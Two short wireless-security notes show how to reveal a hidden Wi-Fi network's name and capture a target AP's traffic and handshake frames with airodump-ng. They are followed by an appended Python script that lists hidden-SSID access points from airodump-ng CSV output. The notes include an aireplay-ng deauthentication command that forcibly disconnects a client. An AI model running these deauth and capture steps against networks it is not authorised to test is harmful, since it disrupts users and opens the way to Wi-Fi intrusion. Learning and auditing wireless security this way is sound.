airodump-ng

Determine Hidden AP's Name

Submitted by rbosaz on Tue, 10/25/2022 - 11:39

First put WLAN in monitoring mode.

Using the following command, find an AP whose ESSID is shown as <length:  0>:

airodump-ng <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where AP_0 is the AP with the zero-length ESSID.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once the client is disconnected it reconnects, and airodump-ng reads the SSID from the client's probe/association frames: notice that the ESSID of AP_0 now displays a name.


Capture Data from Target AP

Submitted by rbosaz on Tue, 10/25/2022 - 11:19

Once you have identified a target AP, run the following command to capture data from it:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit with Ctrl+C or by pressing 'q' twice.

The above command will create the following files:

  • <Output File Name>.csv
  • <Output File Name>.pcap: the packet capture, which contains the handshake frames
  • <Output File Name>.kismet.csv
  • <Output File Name>.kismet.netxml
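The zero-length ESSID that the first note has you spot on screen, and the .csv file that --write produces in the second, can also be checked offline. The following Python script is an added example, not part of rbosaz's notes or of the aircrack-ng project: it parses an airodump-ng-style CSV, lists the APs whose SSID is hidden, and shows which stations were seen associated to them. The column layout and the sample rows are constructed from the CSV format as I know it, so compare the header against a real file from your own interface before relying on it. From a defender's side this is the quick audit that shows why SSID hiding is not a control: any associated client is enough for the name to be recovered.

```python
import csv
import io

# Constructed sample modelled on the CSV that airodump-ng --write produces
# (not a real capture). Layout assumed here: an access-point table, a blank
# line, then a station table. An AP with ID-length 0 and an empty ESSID is
# what the live airodump-ng screen shows as "<length:  0>".
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2022-10-25 11:39:01, 2022-10-25 11:40:10,  6,  54, WPA2, CCMP, PSK, -48,  120,  0,   0.  0.  0.  0,   0, , 
66:77:88:99:AA:BB, 2022-10-25 11:39:02, 2022-10-25 11:40:11, 11,  54, WPA2, CCMP, PSK, -60,   98,  0,   0.  0.  0.  0,   7, HomeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2022-10-25 11:39:05, 2022-10-25 11:40:09, -55,   40, 00:11:22:33:44:55, 
CC:DD:EE:FF:00:11, 2022-10-25 11:39:07, 2022-10-25 11:40:08, -70,    3, (not associated), HomeNet
"""


def _read_table(block):
    """Parse one airodump-ng CSV table into a list of dicts keyed by the
    stripped header names. Cells are stripped because airodump-ng pads
    them with spaces."""
    rows = list(csv.reader(io.StringIO(block), skipinitialspace=True))
    rows = [r for r in rows if r]  # drop empty lines
    if not rows:
        return []
    header = [h.strip() for h in rows[0]]
    table = []
    for row in rows[1:]:
        cells = [c.strip() for c in row]
        # Pad short rows so zip() keeps the columns aligned with the header.
        cells += [""] * (len(header) - len(cells))
        table.append(dict(zip(header, cells)))
    return table


def parse_airodump_csv(text):
    """Split the file into its AP and station sections and parse both."""
    sections = [s for s in text.replace("\r\n", "\n").split("\n\n") if s.strip()]
    aps = _read_table(sections[0]) if sections else []
    stations = _read_table(sections[1]) if len(sections) > 1 else []
    return aps, stations


def hidden_aps(text):
    """Return the APs that hide their SSID (empty ESSID or zero ID-length),
    with their channel, privacy setting and the clients seen associated."""
    aps, stations = parse_airodump_csv(text)
    result = []
    for ap in aps:
        if ap.get("ESSID", "") != "" and ap.get("ID-length", "0") != "0":
            continue  # SSID is broadcast, nothing to report
        clients = [s["Station MAC"] for s in stations if s.get("BSSID") == ap["BSSID"]]
        result.append({
            "bssid": ap["BSSID"],
            "channel": int(ap["channel"]),
            "privacy": ap["Privacy"],
            "clients": clients,
        })
    return result


if __name__ == "__main__":
    for ap in hidden_aps(SAMPLE_CSV):
        print(f"hidden SSID on {ap['bssid']} (channel {ap['channel']}, {ap['privacy']}) "
              f"- associated clients: {', '.join(ap['clients']) or 'none'}")
```

To use it on a real capture, read `<Output File Name>-01.csv` (airodump-ng appends a sequence number to the prefix you gave --write) and pass its contents to hidden_aps(). The station section is what tells you whether a hidden network has any clients at all; an AP with no associated stations is the only case in which hiding the SSID actually keeps it unseen.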